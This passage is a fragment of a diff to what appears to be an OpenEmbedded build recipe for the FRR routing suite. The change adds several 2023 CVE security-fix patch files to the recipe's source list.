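 file://CVE-2023-41909.patch \
+file://CVE-2023-38406.patch \
+file://CVE-2023-38407.patch \
+file://CVE-2023-46752.patch \
+file://CVE-2023-46753.patch \
+file://CVE-2023-47234.patch \
+file://CVE-2023-47235.patch \
 file://frr.pam \
 "
 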